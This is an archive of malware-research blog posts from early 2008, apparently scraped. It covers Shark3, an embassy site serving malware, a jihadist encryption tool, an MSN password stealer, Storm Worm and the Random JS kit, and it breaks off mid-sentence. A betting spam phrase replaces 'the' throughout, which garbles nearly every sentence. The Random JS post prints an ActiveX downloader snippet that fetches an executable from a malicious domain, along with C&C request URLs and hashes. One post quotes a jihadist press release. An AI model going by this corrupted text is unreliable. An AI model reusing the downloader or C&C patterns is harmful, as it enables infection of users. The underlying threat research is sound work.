Thursday, January 31, 2008

The Shark3 Malware is in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Wild

Life's too short to live in uncertainty, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 stakes are too high. A month ago, I indicated cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 upcoming release of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 third version of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 script kiddies favorite Shark Malware. Despite that after cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 negative publicity of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware that's actually promotd as a RAT, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 authors supposedly abondoned cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y seem to have logically resumed its development. And so, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Shark3 malware is continuing its development.
What's new? Anti-debugger capabilities in particural against - VmWare, Norman Sandbox, Sandboxie, VirtualPC, Symantec Sandbox, Virtual Box etc.

Detection rate : Result: 15/31 (48.39%) - Backdoor.Win32.Shark.if
File size: 3104768 bytes
MD5: e3a6758f5c90b39b59c6cd7551224d52
SHA1: 25f025f31560a28275aab006e04aace828e012ea



Some key points regarding Shark :

- its do-it-yourself nature, just like many of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware tools I've covered before is empowering script kiddies with advanced point'n'click capabilities

- built-in spyware functionaly, namely "aggressive service" which resets cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 start-up values when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y're delted, yet anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r indication that what's pitched as a RAT is in fact malware

- once released in an open source form, a community emerges around it one that starts innovating and coming up with new features

Monday, January 28, 2008

The Dutch Embassy in Moscow Serving Malware

The Register reports that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Royal Necá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rlands Embassy in Moscow was serving malware to its visitors at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 beginning of last week :

"Earlier this week, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 site for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Necá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rlands Embassy in Russia was caught serving a script that tried to dupe people into installing software that made cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir machines part of a botnet, according to Ofer Elzam, director of product management for eSafe, a business unit of Aladdin that blocks malicious web content from its customers' networks."

Let's be a little more descriptive. The only IP that was included in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IFRAME was 68.178.194.64/tab.php which was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n forwarding to 68.178.194.64/w/wtsin.cgi?s=z. ip-68-178-194-64.ip.secureserver.net (also responding to lmifsp.com and foxbayrental.com) has been down as of 22 Jan 2008 18:56:38 GMT, but apparantly it was also used in several ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r malware embedded attacks. For instance, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IFRAME is currently active at restorants.ru. The secondary IFRAME is a redirector script in a traffic management script that can load several different URLs, to both, generate fake visits to certain sites that are paying for this, and a live exploit URL as it happens in between.

Historical preservation of actionable intelligence on who's what and what's when is a necessity. Here are for instance two far more in-depth assessments given cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploits URLs were still alive back cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n, discussing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware embedded at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sites of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 U.S Consulate in St. Petersburg, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Syrian Embassy in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 U.K.

Related posts:
MDAC ActiveX Code Execution Exploit Still in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Wild
Malware Serving Exploits Embedded Sites as Usual
Massive RealPlayer Exploit Embedded Attack
A Portfolio of Malware Embedded Magazines
The New Media Malware Gang
The New Media Malware Gang - Part Two
Anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r Massive Embedded Malware Attack
I See Alive IFRAMEs Everywhere
I See Alive IFRAMEs Everywhere - Part Two
Have Your Malware in a Timely Fashion
Cached Malware Embedded Sites
Compromised Sites Serving Malware and Spam
Malware Serving Online Casinos

Monday, January 21, 2008

Mujahideen Secrets 2 Encryption Tool Released

Originally introduced by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Global Islamic Media Front (GIMF), cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 second version of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Mujahideen Secrets encryption tool was released online approximately two days ago, on behalf of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Al-Ekhlaas Islamic Network. Original and translated press release :

"Is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first program of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Islamic multicast security across networks. It represents cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 highest level of technical multicast encrypted but far superior. All communications software, which are manufactured by major companies in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world so that integrates all services communications encrypted in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 small-sized portable. Release I of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "secrets of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mujahideen" cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bulletin brocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 International Islamic Front and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 media have registered so scoop qualitatively in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 field of information and jihadist exploit cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 opportunity to thank cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir wonderful and distinctive. And cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 continuing support of a media jihadist group loyalty in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 technical development of a network of Islamic loyalty program and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 issuance of this version, in support of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mujahideen general and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Islamic State of Iraq in particular."

Key features in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first version :

-- Encryption algorithms using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best five in cryptography. (AES finalist algorithms)

-- Symmetrical encryption keys along cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 256-bit (Ultra Strong Symmetric Encryption)

-- Encryption keys for symmetric length of 2048-bit RSA (husband of a public key and private)

-- Pressure data ROM (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 highest levels of pressure)

-- Keys and encryption algorithms changing technology ghost (Stealthy Cipher)

-- Automatic identification algorithm encryption during decoding (Cipher Auto-detection)

-- Program consisting of one file Facility file does not need assistance to install and can run from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 memory portable

-- Scanning technology security for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 files to be cleared with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 impossibility of retrieving files (Files Shredder)

New features introduced in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 second version :

-- Multicast encrypted via text messages supporting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 immediate use forums (Secure Messaging)

-- Transfer files of all kinds to be shared across texts forums (Files to Text Encoding)

-- Production of digital signature files and make sure it is correct

-- Digital signature of messages and files and to ensure cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 aucá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365nticity of messages and files


So far, Reuters picked up cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 topic - Jihadi software promises secure Web contacts :

"The efficacy of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new Arabic-language software to ensure secure e-mail and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r communications could not be immediately gauged. But some security experts had warned that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 wide distribution of its earlier version among Islamists and Arabic-speaking hackers could prove significant. Al Qaeda supporters widely use cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet to spread cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 group's statements through hundreds of Islamist sites where anyone can post messages. Al Qaeda-linked groups also set up cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir own sites, which frequently have to move after being shut by Internet service providers."

Needless to say that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new features, even cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fact that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y've updated cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 program has to be discussed from a strategic perspective. The improved GUI and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 introduction of digital signing makes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 program a handy tool for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 desktop of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 average cyber jihadist, average in respect to more advanced data hiding techniques, ones already discussed in previous issues of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Technical Mujahid E-zine. With cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tempting feature to embedd cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 encrypted message on a web page instead of sending it, a possibility that's always been cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re namely to use cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Dark Web for secure communication tool is getting closer to reality. Knowing that trying to directly break cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 encryption is impractical, coming up with pragmatic ways to obtain cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 passphrase is what government funded malware coders are trying to figure out. Screenshots courtesy of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tool's tutorial.

E-crime and Socioeconomic Factors

Interesting points by F-Secure with two main issues covered, namely cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lack of employment opportunities for skilled IT people who turn to cyber crime to make a living, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 emerging economies across cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 globe, whose citizens in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir early stages of embracing new economic models will suffer from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 inevitable unequal distribution of income due to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir government's lack of experience or motivation. To me, however, it's more sociocultural than socioeconomic factors that contribute to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se future developments. Several more key points worth discussing :

- Malware is no longer created, it's being generated

The myth of someone reinventing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 wheel, namely coding a malware bot from scratch is no longer realistic. Modern malware is open source, modular, localized to different languages, comes with extensive documentation/comments and HOWTO guides/videos. Moreover, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se publicly obtainable open source malware bots were released in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 wild for free, namely, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 coders that originally started cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "generators" or cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "compilers" generation took, and enjoyed only cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fame that came with coming up with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most widely used and successful bot family. Take Pinch for instance and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 recent arrest of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "coders". New and improved versions of Pinch are making cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir rounds online, but how is this possible since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 people behind it are no longer able to update it? To achieve immortality for Pinch, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y've released it as open source tool, namely anyone can use its successful foundation for any ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r upcoming innovation. The original coders are gone, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "malware generators" and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "compilers" are cheering since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y still have access to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tool. Anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r popular entry obstacle such as advanced coding skills is gone, anyone can compile, generate and spread cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 samples, or used cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m for targeted attacks.

- "Will code malware for food" type of individuals don't really exist anymore

A cat doesn't eat mice when it's hungry, it eats mice when it's already been fed, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365refore does it for prestige and entertainment. Storm Worm is not released by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "desperation department", it's an investment on behalf of someone who will monetize cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 infected hosts, or who has outsourced cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 infection process to botnet aggregators. Moreover, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's no lack of IT employment opportunities in times of growing economy, exactly cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 opposite, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 economy is booming, investments are made in networks and infrastructure and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365refore people will start receiving incentives for training and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365refore cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 demand for IT experts will increase given cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 government is visionary enough to invest in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 long-term, in terms of education and training. If it's not, structural unemployment will undermine cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 local industry, you'll end up with software engineers working at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 local McDonald's during cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 day, and coding malware during cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 night - a stereotype. For instance, go through this article and notice cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 quote regarding cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attitude towards cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 U.S. Malware coders/generators aren't on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 verge of starvation, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y're on a mission with or without actually realizing it :

"I don't see in this a big tragedy," said a respondent who used cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 name Lightwatch. "Western countries played not cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 smallest role in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fall of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Soviet Union. But cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Russians have a very amusing feature — cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are able to get up from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir knees, under any conditions or under any circumstances. As for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 West? "You are getting what you deserve."

It's a type of "Why are you doing me a favour that I still cannnot appreciate?" issue, collectivism vs individualistic societies. E-crime is not just easy to outsource, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 entry barriers in space are so low, we can easily argue it's no longer about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lack of capabilities, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lack of motivation to participate, and actually survive, that drive E-crime particularly in respect to malware. From an economic perspective, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Underground Economy's high liquidity is perhaps cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most logical incentive to participate, which is a clear indication on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 transparency and communication that parties involved have managed to achieve.

Thursday, January 17, 2008

DIY Fake MSN Client Stealing Passwords

This tool deserves our attention mostly because of its do-it-yourself (DIY) nature, just like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 many ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r related ones I discussed before. Custom error messages, two options for to kill or restore MSN after cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password is obtained, and custom FTP settings to upload cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 accounting data. Why did cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y choose FTP compared to email as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 leak point for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data? From my perspective uploading cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 accounting data on an FTP server means compatibility from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 perspective of easily obtaining cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 accounting data to be used as foundation for anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r MSN spreading malware or spim, compared to accessing it from an email account.

File size: 888832 bytes
MD5: 02b0d887aa1cbfd4f602de83f79cf571
SHA1: da49527e96bb998b3763c1d45db97a4d3bccea7a

A sample is detected as W32/VB-Remote-TClient-based!Maximus.

In related news, MSN is said to be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most targeted IM client :

"Within cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IM category, 19 percent of threats were reported on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 AOL Instant Messenger network, 45 percent on MSN Messenger, 20 percent on Yahoo! Instant Messenger and 15 percent on all ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r IM networks including Jabber-based IM private networks. Attacks on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se private networks have more than doubled in share since 2003, rising from seven percent of all IM attacks to 15 percent in 2007."

As always, it's a matter of a vendor's sensors network to come up with increasing or decreasing levels of a particular threat, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pragmatic reality nowadays has to do with less IM spreading malware, and much, much more malware embedded trusted web sites.

Moreover, according to some publicly obtainable stats, IM spreading malware in general has been declining for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 past two years, but how come? It's because of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir broken and bit outdated social engineering model, namely cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lack of messages localization, abuse of public events as windows of opportunities, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lack of any kind of segmentation. One-to-many may be logical from an efficiency point of view, but it's like embedding a single exploit on hundreds of thousands of sites compared to a set of exploits, or a set of techniques like in this case.

Wednesday, January 16, 2008

Storm Worm's St. Valentine Campaign

The Riders on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Storm Worm started riding on yet anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r short term window of opportunity as always - St. Valentine's day with a mass mailing email campaign linking to two files with_love.exe and withlove.exe, using an already infected host as a propagation vector itself in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 very same fashion cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y've been doing so far.

Detection rate : 3/32 (9.38%)
File size: 114689 bytes
MD5: 31ac9582674cad4c8c8068efb173d7c7
SHA1: cee93d3021318a34e188b8fae812aa929cb2bc9c

NOD32v2 - a variant of Win32/Nuwar
Prevx1 - Stormy:All Strains-All Variants
Webwasher-Gateway - Win32.Malware.gen!88 (suspicious)

The binary drops burito.ini (MD5 - A65FA0C23B1078B0758B80B5C0FD37F3) and burito1205-67d5.sys (MD5 - C4B9DD12714666C0707F5A6E39156C11), and creates cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following registry entries :

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_BURITO1205-67D5 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_BURITO1205-67D5\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\burito1205-67d5 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\burito1205-67d5\Security

Surprisingly, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are no client-side vulnerabilities used in last two campaigns.

Tuesday, January 15, 2008

The Random JS Malware Exploitation Kit

The Random JS infection kit as originally named by Finjan, is perhaps cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first publicly announced malicious innovation for 2008, in fact I've managed to obtain a copy of a sample .js and witness cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 filename change on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next request combined with complete disappearance of any .js on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 third visit. Here's some press coverage - "Over 10,000 trusted websites infected by new Trojan toolkit" :

"The random js attack is performed by dynamic embedding of scripts into a webpage. It provides a random filename that can only be accessed once. This dynamic embedding is done in such a selective manner that when a user has received a page with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 embedded malicious script once, it will not be referenced again on furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r requests. This method prevents detection of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware in later forensic analyses."

And several more articles - "Hacking Toolkit Compromises Thousands Of Web Servers" ; "Trojan toolkit infected 10000 Web sites in December" ; "Legitimate sites serving up stealthy attacks". Compared to all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware embedded attacks during 2007 which were serving cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware from a secondary domain, as well as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploits cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves, in attack technique is hosting everything on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 infected domain. Sample random and local malware locations :

bunburyymas.com/ihkxtmzl
bunburyymas.com/odjiffkl
techicorner.com/bcuoixqf
otcash.com/ktehxwmj
otcash.com/soqutkue
otcash.com/bemkwijz

Sample .js random filenames :

cgolu.js; czynd.js; eenom.js; eqfps.js; erztp.js; frpmg.js; iggmy.js; jiodm.js; khkev.js; kksyr.js; kobgw.js; kolqj.js; lvmlt.js; nrvaj.js; oalhi.js; pcqab.js; tezam.js; tfxep.js; unolc.js; vduoz.js;

Sample malware hosting URL snippet :

bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(OBJECT id=yah8 classid=clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F> try { yah8.GetFile( bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(

Copies of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware obtained mosvs8.exe -- and logically submitted to each and every anti virus vendor on behalf of VirusTotal just like every sample I ever came across to in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 incident responses -- attempt to connect to 206.53.51.75, 206.53.56.30, and back39409404.com, making naughty web requests such as :

206.53.51.75/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e
&uptime=00:00:58:38

back39409404.com/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e
&uptime=00:00:58:35

The following files are partly accessible at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 still active C&C's, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first one for instance :

cgi-bin/forms.cgi
cgi-bin/cert.cgi
cgi-bin/options.cgi
cgi-bin/ss.cgi
cgi-bin/pstore.cgi
cgi-bin/cmd.cgi
cgi-bin/file.cgi

Did anti virus vendors come up with a detection pattern for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 .js already? Partly.

Detection rate : Result: 11/32 (34.38%) JS.IEslice.aq; JS/SillyDlScript.DG; Exploit:JS/Mult.K
File size: 31679 bytes
MD5: 93152dc2392349d828526157bf601677
SHA1: 1b10790d16c9c0d87132d40503b37f82b7f03560

And now that we've witnessed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 execution of such an advanced and random attack approach limiting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 possibilities for assessing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 impact of a malware embedded attack cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 way it was done so far, we can only speculate on what's to come by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first quarter of 2008. From my perspective however, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 smartest thing in this type of attack technique is that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y limit cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 leads cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y leave behind to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 minimum, thus, forwarding cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 responsibility to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 infected host and limiting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 possibility for easy expanding of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rest of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir ecosystem. Moreover, despite that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 module or cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actual kit if it's really a kit is a Proprietary Malware Tool for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time being, it will sooner or later leak out, and turn into a commodity, just like MPack and IcePack are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se days.

RBN's Fake Account Suspended Notices

In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last quarter of 2007, under cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 public pressure put on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Russian Business Network's malicious practices, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RBN started faking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 removal of malicious domains from its network by placing fake account suspended notices, but continuing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 malware and exploit serving campaigns on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. And since I constantly monitor RBN activity, in particular cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir relationship with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 New Media Malware Gang and Storm Worm, a relationship that I've in fact established several times before, a recently assessed malicious domain furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r expands cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir underground ecosystem. Let cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data speak for 